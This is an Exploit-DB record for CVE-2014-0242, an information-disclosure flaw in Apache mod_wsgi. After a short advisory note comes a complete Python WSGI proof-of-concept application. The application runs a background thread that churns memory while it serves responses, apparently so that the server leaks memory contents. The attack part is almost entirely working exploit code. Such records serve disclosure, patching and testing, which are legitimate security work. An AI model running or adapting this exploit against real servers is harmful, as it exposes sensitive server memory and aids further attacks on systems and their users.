Apache 'mod_wsgi' Module Information Disclosure Vulnerability

2014-05-21T00:00:00
ID EDB-ID:39196
Type exploitdb
Reporter Buck Golemon
Modified 2014-05-21T00:00:00

Description

Apache 'mod_wsgi' Module Information Disclosure Vulnerability. CVE-2014-0242. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/67534/info

mod_wsgi is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. 

import functools
 
import threading
import time
import random
 
def run(*args):
    while True:
        items = []
        for i in range(1000):
            items.append((int(random.random()*20)*'X'))
        time.sleep(0.00001)
 
thread = threading.Thread(target=run)
thread.start()
 
def headers():
    return [('Content-Type', 'text/plain'.upper().lower())]
 
def response():
    yield 'Hello World!\n'
 
_content_type_cache = {}
 
def intern_content_type(application):
    @functools.wraps(application)
    def _wrapper(environ, start_response):
        def _start_response(status, headers, *args):
            _headers = []
            for header, value in headers:
                if header.lower() == 'content-type':
                    value = _content_type_cache.setdefault(value, value)
                _headers.append((header, value))
            return start_response(status, _headers, *args)
        return application(environ, _start_response)
    return _wrapper
 
#@intern_content_type
def application(environ, start_response):
    status = '200 OK'
 
    start_response(status, headers())
    return response()